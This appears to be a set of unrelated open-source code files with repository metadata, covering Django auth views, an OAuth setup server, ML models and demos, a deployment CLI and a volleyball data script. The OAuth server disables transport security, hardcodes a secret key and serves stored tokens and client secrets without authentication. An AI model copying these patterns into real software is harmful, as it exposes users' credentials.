from django.contrib.auth import authenticate, login as auth_login, logout as auth_logout
from django.http.response import HttpResponse, JsonResponse
from django.views.decorators.csrf import ensure_csrf_cookie
from .forms import UserForm, UserLoginForm, UserCIUploadForm
from .models import UserCustomizableInfo
# Create your views here.
@ensure_csrf_cookie
def get_csrf(req):
if req.method == "GET":
return HttpResponse()
else:
return HttpResponse("Use GET method.")
def get_user(req):
if req.method == "GET":
return HttpResponse("{0}".format(req.user))
def profile(req):
if req.method == "GET":
if not req.user.is_authenticated:
return HttpResponse("Login Required")
else:
userCI = get_object_or_404(UserCustomizableInfo, pk=req.user.id)
try:
return HttpResponse(userCI.profile_img.read(), content_type="image/*")
except:
with open("usrData/defaults/defaultimage.jpeg", "rb") as f:
return HttpResponse(f.read(), content_type="image/*")
if req.method == "POST":
if not req.user.is_authenticated:
return HttpResponse("Login Required")
else:
form = UserCIUploadForm(files=req.FILES)
if form.is_valid():
usrCI = form.save(commit=False)
usrCI.usr = req.user
usrCI.save()
return HttpResponse("OK")
return HttpResponse("Form is not vaild")
else:
return HttpResponse("Wrong method.")
def login(req):
if req.method == "POST":
form = UserLoginForm(req.POST)
if form.is_valid():
username = form.cleaned_data["username"]
password = form.cleaned_data["password"]
user = authenticate(req, username=username, password=password)
if user is not None:
auth_login(req, user)
return HttpResponse("OK")
else:
ret = {"errs": [{"errName": "usernotfoundERR",
"errDescription": "존재하지 않는 사용자이거나 비밀번호가 틀렸습니다."}]}
return JsonResponse(data=ret)
else:
ret = {"errs": []}
for (k, v) in form.errors.as_data().items():
for (idx, _v) in enumerate(v):
ret["errs"].append(
{"errName": k+"ERR", "errDescription": "{0}".format(_v)[2:-2]})
return JsonResponse(data=ret)
else:
return HttpResponse("{0}".format(req.user))
@login_required(login_url="http://localhost:3000/login")
def logout(req):
if req.method == "POST":
auth_logout(req)
return HttpResponse("LOGOUT")
else:
return HttpResponse("Error. Wrong request method ({0}). Use POST.".format(req.method))
def signup(req):
if req.method == "POST":
form = UserForm(req.POST)
if form.is_valid():
form.save(commit=False)
username = form.cleaned_data['username']
raw_password = <PASSWORD>.cleaned_data['<PASSWORD>']
if len(User.objects.filter(username=username)):
ret = {"errs": [{"errName": "usernameSIGNUPERR",
"errDescription": "{0}은(는) 이미 존재하는 아이디입니다.".format(username)}]}
return JsonResponse(data=ret)
else:
form.save()
user = authenticate(username=username, password=<PASSWORD>)
UserCustomizableInfo(usr=user).save()
auth_login(req, user)
return HttpResponse("SIGNUP")
else:
ret = {"errs": []}
for (k, v) in form.errors.as_data().items():
for (idx, _v) in enumerate(v):
ret["errs"].append(
{"errName": k+"SIGNUPERR", "errDescription": "{0}".format(_v)[2:-2]})
return JsonResponse(data=ret)
else:
return HttpResponse("Error. Wrong request method ({0}). Use POST.".format(req.method))
def getUserVote(req):
if req.method == "GET":
if not req.user.is_authenticated:
return HttpResponse("Login required")
ret = {"userUpvotes": [], "userDownvotes": []}
usr = req.user
for item in usr.product_upvotes.all():
d = item.getNonNullValDict()
d["author_name"] = item.author.username
ret["userUpvotes"].append(d)
for item in usr.product_downvotes.all():
d = item.getNonNullValDict()
d["author_name"] = item.author.username
ret["userDownvotes"].append(d)
return JsonResponse(data=ret)
else:
return HttpResponse("Error. Wrong request method ({0}). Use POST.".format(req.method))
``` |
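The `login` view sits behind Django's CSRF protection, which is what the `get_csrf` endpoint is for. A hedged sketch of the client-side flow with `requests`; the URL prefixes here are assumptions, since the project's `urls.py` is not shown:
```python
import requests

BASE = "http://localhost:8000/common"            # assumed mount point for these views
s = requests.Session()

s.get(f"{BASE}/csrf/")                           # assumed route to get_csrf; sets the csrftoken cookie
token = s.cookies.get("csrftoken")

resp = s.post(f"{BASE}/login/",
              data={"username": "alice", "password": "secret"},
              headers={"X-CSRFToken": token, "Referer": BASE})
print(resp.text)                                 # "OK" on success, a JSON error payload otherwise
```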
{
"source": "jinsuki/LMDB",
"score": 4
} |
#### File: LMDB/main/media.py
```python
class Video():
def __init__(self, duration, image, storyline,
title):
self.duration = duration
self.image = image
self.storyline = storyline
self.title = title
#movie subclass
class Movie(Video):
def __init__(self, duration, image, storyline,title, link):
Video.__init__(self, duration, image, storyline, title)
self.link = link
#tvshow subclass
class TVShow(Video):
def __init__(self, duration, image, storyline,
title, episode, season):
Video.__init__(self, duration, image, storyline, title)
self.episode = episode
self.season = season
``` |
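A quick instantiation check showing that the subclasses only add fields on top of the shared `Video` attributes (with the classes above in scope; the values are made up):
```python
movie = Movie(duration=142, image="poster.jpg", storyline="...", title="Example Movie",
              link="https://example.com/trailer")
show = TVShow(duration=45, image="still.jpg", storyline="...", title="Example Show",
              episode=3, season=1)
print(movie.title, movie.link)
print(show.title, show.season, show.episode)
```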
{
"source": "jinsukoh/nugu-linux",
"score": 3
} |
#### File: examples/oob_setup/nugu_oob_server.py
```python
from flask import Flask, request, redirect, session, json, url_for, make_response
from flask.json import jsonify
from flask_restful import Resource, Api
from requests_oauthlib import OAuth2Session
import os
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
PORT = 8080
# Receive from companion application
if 'NUGU_CONFIG_PATH' in os.environ:
CONFIG_PATH = os.environ['NUGU_CONFIG_PATH']
else:
CONFIG_PATH = '/var/lib/nugu'
print 'Configuration path = %s' % CONFIG_PATH
if os.path.isdir(CONFIG_PATH):
print 'path exist'
else:
print 'create directory'
os.makedirs(CONFIG_PATH)
CONFIG_PATH_AUTH = CONFIG_PATH + '/nugu-auth.json'
DEFAULT_JSON_AUTH = """{
"access_token": "",
"expires_in": "",
"refresh_token": "",
"token_type": ""
}
"""
# OAuth
CONFIG_PATH_OAUTH = CONFIG_PATH + '/nugu-oauth.json'
DEFAULT_JSON_OAUTH = """{
"pocId": "",
"clientId": "",
"clientSecret": "",
"deviceSerialNumber": ""
}
"""
authorization_base_url = 'https://api.sktnugu.com/v1/auth/oauth/authorize'
token_url = 'https://api.sktnugu.com/v1/auth/oauth/token'
redirect_uri = 'http://lvh.me:8080/callback'
app = Flask(__name__)
app.secret_key = "test"
@app.route('/auth', methods=['GET', 'PUT'])
def auth():
if request.method == 'GET':
with open(CONFIG_PATH_AUTH, 'r') as reader:
resp = make_response(reader.read())
resp.mimetype = 'application/json'
return resp
elif request.method == 'PUT':
with open(CONFIG_PATH_AUTH, 'w') as writer:
writer.write(request.data)
return jsonify(success=True)
@app.route('/oauth', methods=['GET', 'PUT', 'POST'])
def oauth():
if request.method == 'GET':
with open(CONFIG_PATH_OAUTH, 'r') as reader:
resp = make_response(reader.read())
resp.mimetype = 'application/json'
return resp
elif request.method == 'PUT':
with open(CONFIG_PATH_OAUTH, 'w') as writer:
writer.write(request.data)
return jsonify(success=True)
elif request.method == 'POST':
pocId = request.form['pocId']
clientId = request.form['clientId']
clientSecret = request.form['clientSecret']
deviceSerialNumber = request.form['serial']
buf = """{{
"pocId": "{pocId}",
"clientId": "{clientId}",
"clientSecret": "{clientSecret}",
"deviceSerialNumber": "{serial}"
}}""".format(pocId=pocId, clientId=clientId, clientSecret=clientSecret, serial=deviceSerialNumber)
with open(CONFIG_PATH_OAUTH, 'w') as writer:
writer.write(buf)
return redirect(url_for('index'))
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('index'))
@app.route('/')
def index():
with open(CONFIG_PATH_OAUTH, 'r') as reader:
oauthinfo = json.load(reader)
if 'pocId' in oauthinfo:
pocId = oauthinfo['pocId']
else:
pocId = ''
if 'clientId' in oauthinfo:
clientId = oauthinfo['clientId']
else:
clientId = ''
if 'clientSecret' in oauthinfo:
clientSecret = oauthinfo['clientSecret']
else:
clientSecret = ''
if 'deviceSerialNumber' in oauthinfo:
serial = oauthinfo['deviceSerialNumber']
else:
serial = ''
if 'token' in session:
token = session['token']
if 'refresh_token' in token:
refresh_token=token['refresh_token']
else:
refresh_token=''
loginForm = """
<table width=100%>
<tr>
<th>access_token</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{access_token}"/></td>
</tr>
<tr>
<th>expires_at</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{expires_at}"/></td>
</tr>
<tr>
<th>expires_in</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{expires_in}"/></td>
</tr>
<tr>
<th>refresh_token</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{refresh_token}"/></td>
</tr>
<tr>
<th>token_type</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{token_type}"/></td>
</tr>
</table>
<p align="center"><a href="/logout">Logout</a></p>
""".format(access_token=token['access_token'], expires_at=token['expires_at'], expires_in=token['expires_in'], refresh_token=refresh_token, token_type=token['token_type'])
else:
loginForm = """
<p align="center"><a href="/login">Get OAuth2 token</a></p>
"""
return """<!DOCTYPE HTML>
<html>
<head>
</head>
<body>
<fieldset>
<legend>User</legend>
{loginForm}
</fieldset>
<form method=post action='/oauth'>
<fieldset>
<legend>OAuth2 information</legend>
<table width=100%>
<tr>
<th>poc_id</th>
<td width=100%><input style="width:100%;" type=text name=pocId value="{pocId}"/></td>
</tr>
<tr>
<th>client_id</th>
<td width=100%><input style="width:100%;" type=text name=clientId value="{clientId}"/></td>
</tr>
<tr>
<th>client_secret</th>
<td width=100%><input type=text style="width:100%;" name=clientSecret value="{clientSecret}"/></td>
</tr>
<tr>
<th>device serial</th>
<td width=100%><input type=text style="width:100%;" name=serial value="{serial}"/></td>
</tr>
<tr>
<td colspan=2 align=center>
<a href="/">Reload</a> <input type=submit value="Save"/>
</td>
</tr>
</table>
</fieldset>
</form>
</body>
</html>""".format(loginForm=loginForm, pocId=pocId, clientId=clientId, clientSecret=clientSecret, serial=serial)
@app.route('/login')
def login():
with open(CONFIG_PATH_OAUTH, 'r') as reader:
oauthinfo = json.load(reader)
clientId = oauthinfo['clientId']
serial = oauthinfo['deviceSerialNumber']
nugu = OAuth2Session(clientId, redirect_uri=redirect_uri)
authorization_url, state = nugu.authorization_url(
authorization_base_url, data='{{"deviceSerialNumber":"{serial}"}}'.format(serial=serial))
# State is used to prevent CSRF(Cross Site Request Forgery), keep this for later.
print 'state=%s' % state
session['oauth_state'] = state
return redirect(authorization_url)
@app.route('/callback')
def callback():
with open(CONFIG_PATH_OAUTH, 'r') as reader:
oauthinfo = json.load(reader)
clientId = oauthinfo['clientId']
clientSecret = oauthinfo['clientSecret']
if 'oauth_state' in session:
oauth_state = session['oauth_state']
print 'state=%s' % oauth_state
else:
oauth_state = ''
print 'can not found oauth_state'
nugu = OAuth2Session(
clientId, state=oauth_state, redirect_uri=redirect_uri)
token = nugu.fetch_token(token_url, client_secret=clientSecret,
authorization_response=request.url)
print token
token_json = json.dumps(token)
print token_json
with open(CONFIG_PATH_AUTH, 'w') as writer:
writer.write(token_json)
session['token'] = token
return redirect(url_for('index'))
if __name__ == '__main__':
if not os.path.exists(CONFIG_PATH_AUTH):
print "Create default %s" % CONFIG_PATH_AUTH
with open(CONFIG_PATH_AUTH, 'w') as writer:
writer.write(DEFAULT_JSON_AUTH)
if not os.path.exists(CONFIG_PATH_OAUTH):
print "Create default %s" % CONFIG_PATH_OAUTH
with open(CONFIG_PATH_OAUTH, 'w') as writer:
writer.write(DEFAULT_JSON_OAUTH)
print "Please connect to %d port." % PORT
app.run(host='0.0.0.0', port=PORT)
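# --- Usage sketch (not part of the original script): after the OAuth login has
# been completed in a browser, another process on the device could read the
# stored token back through the /auth endpoint. Assumes the `requests` package
# is available and that this server is reachable on localhost:8080.
#
#   import requests
#   token = requests.get('http://localhost:8080/auth').json()
#   print token.get('access_token')   # empty string until /callback has stored a token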
``` |
{
"source": "Jinsu-L/KELIP",
"score": 2
} |
#### File: KELIP/demo/demo_zeroshot.py
```python
import os
import sys
import json
import torch
import kelip
import gradio as gr
def load_model():
model, preprocess_img, tokenizer = kelip.build_model('ViT-B/32')
device = "cuda" if torch.cuda.is_available() else "cpu"
model = model.to(device)
model.eval()
model_dict = {'model': model,
'preprocess_img': preprocess_img,
'tokenizer': tokenizer
}
return model_dict
def classify(img, user_text):
preprocess_img = model_dict['preprocess_img']
input_img = preprocess_img(img).unsqueeze(0)
device = "cuda" if torch.cuda.is_available() else "cpu"
input_img = input_img.to(device)
# extract image features
with torch.no_grad():
image_features = model_dict['model'].encode_image(input_img)
# extract text features
user_texts = user_text.split(',')
if user_text == '' or user_text.isspace():
user_texts = []
input_texts = model_dict['tokenizer'].encode(user_texts)
if torch.cuda.is_available():
input_texts = input_texts.cuda()
text_features = model_dict['model'].encode_text(input_texts)
# l2 normalize
image_features /= image_features.norm(dim=-1, keepdim=True)
text_features /= text_features.norm(dim=-1, keepdim=True)
similarity = (100.0 * image_features @ text_features.T).softmax(dim=-1)
values, indices = similarity[0].topk(len(user_texts))
result = {}
for value, index in zip(values, indices):
result[user_texts[index]] = f"{value.item()*100:.2f}%"
return result
if __name__ == '__main__':
print('\tLoading models')
global model_dict
model_dict = load_model()
# define gradio demo
inputs = [gr.inputs.Image(type="pil", label="Image"),
gr.inputs.Textbox(lines=5, label="Caption"),
]
outputs = gr.outputs.KeyValues()
title = "Zeroshot classification demo"
if torch.cuda.is_available():
demo_status = "Demo is running on GPU"
else:
demo_status = "Demo is running on CPU"
description = f"Details: paper_url. {demo_status}"
examples = [
["demo/images/jkh.png", "장기하,아이유,조인성,마동석"],
["demo/images/jkh.png", "눈감았음,눈떴음"],
["demo/images/squid_sundae.jpg", "오징어 순대,김밥,순대,떡볶이"],
["demo/images/poysian.jpg", "립스틱,분필,야돔"],
["demo/images/world_peace_gate.jpg", "평화의문,올림픽공원,롯데월드,석촌호수"],
["demo/images/seokchon_lake.jpg", "평화의문,올림픽공원,롯데월드,석촌호수"],
["demo/images/hwangchil_tree.jpg", "황칠 나무 묘목,황칠 나무,난,소나무 묘목,야자수"],
["demo/images/areca_palm.jpg", "아레카야자,난초,난,식물,장미,야자수,황칠나무"],
["demo/images/world_peace_gate.jpg", "봄,여름,가을,겨울"],
["demo/images/seokchon_lake.jpg", "봄,여름,가을,겨울"],
["demo/images/spring.jpg", "봄,여름,가을,겨울"],
["demo/images/summer1.jpg", "봄,여름,가을,겨울"],
["demo/images/summer2.jpeg", "봄,여름,가을,겨울"],
["demo/images/autumn1.JPG", "봄,여름,가을,겨울"],
["demo/images/autumn2.jpg", "봄,여름,가을,겨울"],
["demo/images/winter1.jpg", "봄,여름,가을,겨울"],
["demo/images/winter2.jpg", "봄,여름,가을,겨울"],
["demo/images/airplane.png", "a photo of a airplane.,a photo of a bear.,a photo of a bird.,a photo of a giraffe.,a photo of a car."],
["demo/images/airplane.png", "비행기 사진.,곰 사진.,새 사진.,기린 사진.,자동차 사진."],
["demo/images/volleyball.png", "a photo of a person volleyball spiking.,a photo of a person jump rope.,a photo of a person soccer penalty.,a photo of a person long jump.,a photo of a person table tennis shot."],
["demo/images/volleyball.png", "배구 스파이크하는 사람의 사진.,줄넘기하는 사람의 사진.,축구 페널티하는 사람의 사진.,멀리뛰기하는 사람의 사진.,탁구 치는 사람의 사진."],
]
gr.Interface(classify,
inputs,
outputs,
title=title,
description=description,
examples=examples,
examples_per_page=50,
server_name="0.0.0.0",
server_port=10000
).launch()
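# --- Usage note (not part of the original file): with the kelip and gradio
# packages installed, this demo is typically started from the repository root,
# e.g. `python demo/demo_zeroshot.py`. The caption textbox takes a
# comma-separated list of candidate labels, and `classify` returns the
# softmax-normalised image-text similarity for each of them.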
``` |
{
"source": "jinsungit/hiddenfootprints",
"score": 3
} |
#### File: hiddenfootprints/hiddenfootprints/core.py
```python
import numpy as np
import tensorflow as tf
from .utils import get_global_box, box_label_to_corners, global_box_to_camera_image_matmul, convert_camera_gc
def read_single_frame(frame_record, open_dataset, selected_camera='FRONT'):
"""Return a dictionary for the given frame.
frame['im']: image.
frame['extrinsic']: selected camera extrinsic matrix.
frame['intrinsic']: selected camera intrinsic matrix.
frame['boxes_coords']: global coordinates of 8 corners of 3d labeled boxes, size Nx8x3
frame['boxes_id']: semantic id of 3d labeled boxes. See Waymo documentation for classes.
"""
frame = {}
#################
# images
for index, image in enumerate(frame_record.images):
if open_dataset.CameraName.Name.Name(image.name) == selected_camera:
im = tf.image.decode_jpeg(image.image).numpy()
frame['im'] = im
#################
# camera extrinsic (global frame to camera frame) and intrinsic
for camera in frame_record.context.camera_calibrations:
if open_dataset.CameraName.Name.Name(camera.name) == selected_camera:
extrinsic_mat = np.array(camera.extrinsic.transform).reshape(4,4)# this is camera to vehicle
extrinsic = convert_camera_gc(extrinsic_mat, np.array(frame_record.pose.transform).reshape(4,4)) # 4x4
intrinsic = camera.intrinsic # 9
frame['extrinsic'] = extrinsic
frame['intrinsic'] = intrinsic
#################
# 3D boxes in global frame
frame['boxes_coords'] = []
frame['boxes_id'] = []
for chosen_obj in frame_record.laser_labels:
# convert box to 3d cube corners in global frame
obj_corners_3d_global_standard = get_global_box(frame_record, chosen_obj) # 3x8
frame['boxes_coords'].append(obj_corners_3d_global_standard.transpose())
frame['boxes_id'].append(chosen_obj.type)
frame['boxes_coords'] = np.array(frame['boxes_coords'])
return frame
def propagate(reference_frame_idx, frames):
"""Return all boxes in the segment propagated into the reference frame, shape Nx3
reference_frame_propagated_labels: [id,x,y]
"""
reference_frame_camera_extrinsic = frames[reference_frame_idx]['extrinsic']
reference_frame_camera_intrinsic = frames[reference_frame_idx]['intrinsic']
reference_frame_propagated_labels = []
for source_frame_idx in range(len(frames)): # loop through all frames
for box_idx in range(len(frames[source_frame_idx]['boxes_id'])): # for each object in current frame
semantic_id = frames[source_frame_idx]['boxes_id'][box_idx]
chosen_box_coords = frames[source_frame_idx]['boxes_coords'][box_idx,:].reshape((8,3))
# project to camera frame of 8 corners
box_coords_projected_8_corners = global_box_to_camera_image_matmul(chosen_box_coords,
reference_frame_camera_extrinsic,
reference_frame_camera_intrinsic)
if box_coords_projected_8_corners.shape[0]>4: # valid projected bottom face of 3D boxes
footprint_x, footprint_y = box_coords_projected_8_corners[4:,:].mean(axis=0)
reference_frame_propagated_labels.append([semantic_id, footprint_x, footprint_y])
return np.array(reference_frame_propagated_labels)
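# --- Usage sketch (not part of the original module). The TFRecord path is a
# placeholder, and the Waymo Open Dataset import below is an assumption about
# the caller's environment (it is how `open_dataset` is usually provided).
#
#   import tensorflow as tf
#   from waymo_open_dataset import dataset_pb2 as open_dataset
#
#   records = tf.data.TFRecordDataset('segment-xxxx.tfrecord', compression_type='')
#   frames = []
#   for data in records:
#       frame_record = open_dataset.Frame()
#       frame_record.ParseFromString(bytearray(data.numpy()))
#       frames.append(read_single_frame(frame_record, open_dataset, 'FRONT'))
#
#   # Propagate every labelled box in the segment into frame 0 of the FRONT camera.
#   labels_xy = propagate(0, frames)   # rows of [semantic_id, x_pixel, y_pixel]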
```
#### File: hiddenfootprints/model/resnet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import importlib
import numpy as np
def class_for_name(module_name, class_name):
# load the module, will raise ImportError if module cannot be loaded
m = importlib.import_module(module_name)
# get the class, will raise AttributeError if class cannot be found
return getattr(m, class_name)
class conv(nn.Module):
def __init__(self, num_in_layers, num_out_layers, kernel_size, stride, linear_output=False):
super(conv, self).__init__()
self.kernel_size = kernel_size
self.conv_base = nn.Conv2d(num_in_layers, num_out_layers, kernel_size=kernel_size, stride=stride)
self.normalize = nn.BatchNorm2d(num_out_layers)
self.linear_output = linear_output
def forward(self, x):
p = int(np.floor((self.kernel_size - 1) / 2))
p2d = (p, p, p, p)
x = self.conv_base(F.pad(x, p2d))
if self.linear_output:
return x
x = self.normalize(x)
return F.elu(x, inplace=True)
class upconv(nn.Module):
def __init__(self, num_in_layers, num_out_layers, kernel_size, scale):
super(upconv, self).__init__()
self.scale = scale
self.conv1 = conv(num_in_layers, num_out_layers, kernel_size, 1)
def forward(self, x):
x = nn.functional.interpolate(x, scale_factor=self.scale, mode='bilinear', align_corners=True)
return self.conv1(x)
class ResUNet(nn.Module):
def __init__(self, encoder='resnet50', pretrained=True, num_in_layers=4, num_out_layers=2, linear_output=False):
super(ResUNet, self).__init__()
self.pretrained = pretrained
assert encoder in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152'], "Incorrect encoder type"
if encoder in ['resnet18', 'resnet34']:
filters = [64, 128, 256, 512]
else:
filters = [256, 512, 1024, 2048]
resnet = class_for_name("torchvision.models", encoder)(pretrained=pretrained)
if num_in_layers != 3: # Number of input channels
self.firstconv = nn.Conv2d(num_in_layers, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
else:
self.firstconv = resnet.conv1 # H/2
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool # H/4
# encoder
self.encoder1 = resnet.layer1 # H/4
self.encoder2 = resnet.layer2 # H/8
self.encoder3 = resnet.layer3 # H/16
# decoder
self.upconv4 = upconv(filters[2], 512, 3, 2)
self.iconv4 = conv(filters[1] + 512, 512, 3, 1)
self.upconv3 = upconv(512, 256, 3, 2)
self.iconv3 = conv(filters[0] + 256, 256, 3, 1)
self.outconv = conv(256, num_out_layers, 1, 1, linear_output=linear_output)
# self.outconv = conv(256, num_out_layers, 1, 1
def skipconnect(self, x1, x2):
diffY = x2.size()[2] - x1.size()[2]
diffX = x2.size()[3] - x1.size()[3]
x1 = F.pad(x1, (diffX // 2, diffX - diffX // 2,
diffY // 2, diffY - diffY // 2))
# for padding issues, see
# https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a
# https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd
x = torch.cat([x2, x1], dim=1)
return x
def forward(self, x, return_ft=False):
# encoding
x1 = self.firstconv(x)
x1 = self.firstbn(x1)
x1 = self.firstrelu(x1)
x1 = self.firstmaxpool(x1)
x2 = self.encoder1(x1)
x3 = self.encoder2(x2)
x4 = self.encoder3(x3)
# decoding
x = self.upconv4(x4)
x = self.skipconnect(x3, x)
x = self.iconv4(x)
x = self.upconv3(x)
x = self.skipconnect(x2, x)
ft = self.iconv3(x)
x = self.outconv(ft)
if return_ft:
return x, ft
else:
return x
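# --- Shape-check sketch (not part of the original file): run the network on a
# dummy batch. The encoder choice and input size are illustrative only;
# pretrained=False avoids downloading weights.
if __name__ == '__main__':
    net = ResUNet(encoder='resnet18', pretrained=False, num_in_layers=3, num_out_layers=2)
    dummy = torch.randn(1, 3, 256, 512)        # (batch, channels, H, W)
    out, ft = net(dummy, return_ft=True)
    print(out.shape, ft.shape)                 # both at 1/4 of the input resolution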
``` |
{
"source": "Jinsung-L/sit",
"score": 2
} |
#### File: sitmango/scripts/init.py
```python
import click
from pathlib import Path
import shutil
import json
import re
from .utils import render_template
@click.command()
@click.option('--debug/--no-debug', default=False)
@click.pass_context
def init(ctx, debug):
"""Initiate sit project on current folder."""
DEBUG = ctx.obj['DEBUG'] or debug
MODULE_PATH = ctx.obj['MODULE_PATH']
PROJECT_PATH = Path('.')
PROJECT_NAME = PROJECT_PATH.resolve().name
# Check if there is package.
if not (PROJECT_PATH / 'setup.py').is_file():
click.echo(click.style('ERROR: ', 'red')+"There is no python package found in this directory.")
ctx.exit()
# Check if project initiated
SIT_PATH = PROJECT_PATH / '.sit'
if SIT_PATH.is_dir():
# Load config
with open(SIT_PATH / 'config.json') as file:
SIT_CONFIG = json.load(file)
# Check if remote server is set up
if SIT_CONFIG['remote_setup']:
click.confirm('Remote server is already set up. Do you want to proceed it anyway?', abort=True)
REMOTE_ADDRESS = click.prompt('Remote server address', type=str)
REMOTE_USER = click.prompt('Remote user', type=str)
# Create .sit directory
SIT_PATH = PROJECT_PATH / '.sit'
SIT_PATH.mkdir(parents=True, exist_ok=True)
# Create config.json
config = {
'remote_address': REMOTE_ADDRESS,
'remote_username': REMOTE_USER,
'remote_project_path': '/home/{}/sit/{}'.format(REMOTE_USER, PROJECT_NAME),
'remote_setup': False,
# TODO: Update this to 'localhost' after support of nginx
'gunicorn_host': '0.0.0.0',
'gunicorn_port': 8000,
'gunicorn_user': REMOTE_USER,
'gunicorn_group': REMOTE_USER,
'server_name': '',
}
CONFIG_PATH = SIT_PATH / 'config.json'
with open(str(CONFIG_PATH), 'w') as file:
json.dump(config, file, indent=4)
# Copy supervisord.conf
shutil.copyfile(
MODULE_PATH / 'templates/sit/supervisord.conf',
SIT_PATH / 'supervisord.conf'
)
# Append .gitignore
GITIGNORE_PATH = PROJECT_PATH / '.gitignore'
with open(str(GITIGNORE_PATH)) as file:
gitignore = file.read()
if re.search(r'# sit', gitignore) is None:
with open(str(GITIGNORE_PATH), 'a') as file:
file.write("\n# sit\n.sit/\n")
success_message = """
Initiated {sit} for {project_name}
Configuration file is created at {config_path}
You can manually configure this file.
Now you can make your first deployment by running:
{sit_deploy}
Deploys the application to the production server.
This will set up the remote server at the first run.
After then, it'll just deploy your application.""".format(
sit=click.style('sit', 'cyan'),
project_name=click.style(PROJECT_NAME, 'green'),
config_path=click.style(str(CONFIG_PATH), 'green'),
sit_deploy=click.style('sit deploy', 'cyan')
)
click.echo(success_message)
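# --- Illustrative result (not part of the original command): for a project
# named "myapp" with remote user "deploy" at 203.0.113.10, the generated
# .sit/config.json would look roughly like:
#
#   {
#       "remote_address": "203.0.113.10",
#       "remote_username": "deploy",
#       "remote_project_path": "/home/deploy/sit/myapp",
#       "remote_setup": false,
#       "gunicorn_host": "0.0.0.0",
#       "gunicorn_port": 8000,
#       "gunicorn_user": "deploy",
#       "gunicorn_group": "deploy",
#       "server_name": ""
#   }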
``` |
{
"source": "JinSungYoon/Graduate_work",
"score": 3
} |
#### File: Graduate_work/Analysis/Analysis_Beautifulsoup.py
```python
import csv
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pylab as plt
# Display Korean labels by changing the font settings through matplotlib's font_manager
# http://gomguard.tistory.com/172
# Import needed so that Korean fonts are not broken in the plots
import matplotlib.font_manager as fm
# Specify the font file to load
font_location='E:/글꼴/H2GTRE.TTF'
# Specify the font name
font_name=fm.FontProperties(fname=font_location).get_name()
mpl.rc('font',family=font_name)
# Import for loading a module that lives in another directory
import sys
# Add the directory to the path so that the module below can be imported
sys.path.insert(0,'E:\대학교\졸업\졸업작품\웹크롤링\Webcrwaling and scraping using python')
import kovo_game_data_Beautifulsoup as kovo
# Read data with pandas
# Read a UTF-8 encoded file
#table=pd.read_csv('서울시 대중교통 수단별 이용 현황.csv',delimiter=',',engine='python',encoding="utf-8")
# Read an EUC-KR encoded file
#test=pd.read_csv('서울교통공사 2016년 일별 역별 시간대별 승하차인원(1_8호선).csv',engine='python',encoding='EUC-KR')
# Load the volleyball season data
Season_result=pd.read_csv('E:/대학교/졸업/졸업작품/웹크롤링/Webcrwaling and scraping using python/Season_result.csv',engine='python',encoding='EUC-KR')
# Reset the season data index to the Date column
Season_result=Season_result.set_index("Date")
# How to write SQL-like queries in pandas: https://codeburst.io/how-to-rewrite-your-sql-queries-in-pandas-and-more-149d341fc53e
# Select only KEPCO's matches in a season: table.query(column_condition |(or) &(and) column_condition)
#print(Season_result.query("Home=='한국전력'|Away=='한국전력'"))
# ==================================== Seven seasons of league result data ===========================================================
"""
# 시즌 7년 데이터 불러오기
# 10년치 데이터를 긁어오려고 하였으나 2011년도부터 승점 제도가 도입되었고, 그에따른 플레이오프 진출 규정도 승점제도로 변경되어 7년전 데이터부터 긁어왔다.
MSeason=kovo.MSeason
FSeason=kovo.FSeason
# 플레이오프에 진출여부에 대한 column을 하나 생성한다.
# 플레이오프에 진출하기위한 조건은 남자,여자부 3위 이내 팀은 자동 진출이고 남자부의 경우에만 3위와 4위의 승점이 3점 이내일 경우 플레이오프에 진출한다.
MPlay_off = [ [] for i in range(len(MSeason))]
FPlay_off = [ [] for i in range(len(FSeason))]
for year in range(len(MSeason)):
for rank in range(len(MSeason[year])):
if rank<3:
MPlay_off[year].append(1)
else:
# 2010-2011시즌부터 남자부는 3위와 4위가 승점이 3점 이내로 났을경우 준플레이오프에 진출하게 된다.
if (rank==3 and MSeason[year].iloc[2]["승점"]-MSeason[year].iloc[3]["승점"]<=3):
MPlay_off[year].append(1)
else:
MPlay_off[year].append(0)
for year in range(len(FSeason)):
for rank in range(len(FSeason[year])):
if rank<3:
FPlay_off[year].append(1)
else:
FPlay_off[year].append(0)
print(Mplay_off)
for loop in range(len(MPlay_off)):
MSeason[loop]["플레이오프_진출"]=MPlay_off[loop]
FSeason[loop]["플레이오프_진출"]=FPlay_off[loop]
MAll_data = []
FAll_data = []
for year in range(len(MSeason)):
for team in range(len(MSeason[year])):
MAll_data.append(MSeason[year].iloc[team])
for year in range(len(FSeason)):
for team in range(len(FSeason[year])):
FAll_data.append(FSeason[year].iloc[team])
Mavg = [ [] for i in range(5) ]
Favg = [ [] for i in range(5) ]
index = 0
for i in range(len(MSeason)):
Mavg[index].append(float(MSeason[i].iloc[2:3]["승점"]))
Favg[index].append(float(FSeason[i].iloc[2:3]["승점"]))
Mavg[index+1].append(float(MSeason[i].iloc[2:3]["승"]))
Favg[index+1].append(float(FSeason[i].iloc[2:3]["승"]))
Mavg[index+2].append(float(MSeason[i].iloc[2:3]["패"]))
Favg[index+2].append(float(FSeason[i].iloc[2:3]["패"]))
Mavg[index+3].append(float(MSeason[i].iloc[2:3]["세트득실률"]))
Favg[index+3].append(float(FSeason[i].iloc[2:3]["세트득실률"]))
Mavg[index+4].append(float(MSeason[i].iloc[2:3]["점수득실률"]))
Favg[index+4].append(float(FSeason[i].iloc[2:3]["점수득실률"]))
def avg(line):
sum=0
for loop in range(len(line)):
sum+=line[loop]
return sum/len(line)
